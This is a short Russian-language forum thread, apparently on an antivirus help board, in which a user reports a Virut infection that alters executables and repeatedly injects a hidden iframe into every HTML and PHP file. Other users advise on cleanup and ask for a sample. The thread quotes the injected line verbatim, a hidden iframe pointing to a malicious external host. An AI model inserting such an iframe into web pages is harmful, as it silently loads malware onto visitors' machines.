/jL.chura.pl

[Spirit19]

Вирус заражает находящиеся на диске C: исполняемые файлы (в основном .exe, но возможно не только), не исключино что и на других дисках поскольку после установки винды вирус появился вновь.. дописывая до каждого из них 18944 байта своего кода, особенно усердствуя в папке C:\Windows\system32\. неизвестные процессы не обнаружены

В результате действия вируса во всех .html и .php файлах на диске C:, а также на других дисках в тех папках, которые открывались в Проводнике или TotalCommander, начинает перед тегом "</body>" в бесконечном цикле добавлятся следующая строчка:

CODE
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

после удаления через секунду код появляется вновь




после повторной периустановки голой винды в хтмл файлы ничего не дописывается, поетапно будем подключать винду к нету, ставить софт, посмотрим когда активизируется вирус, хочу сравнить исходники инсталях на других дисках, почему то кажется что ехе шники по всех разделах побиты

доктор веб (CureIt) идинтифицирует его как Virus.Win32.Virut.56

[PavelA]

Куреитом до полного излечения лечились?

[Spirit19]

до конца не лечился, влом 10 часов ждать, поставил винду как ни странно со всех php файлов на всех дисках удалилились вирусные строки перед боди, подключился в инет все тихо, запустил любой екзешник с любого диска не С, винт сново всбесился во всех 20000 веб файлах опять таже строка
способ ли чения, удалить все ехе файлы со всех дисков, форматить диск С, чем щас и займусь, вирус неплохой новый, пока в СНГ не много его схватили антивирусы на него не реагируют...

[pig]

То, что запускали (любой екзешник с любого диска не С), - пришлите по правилам.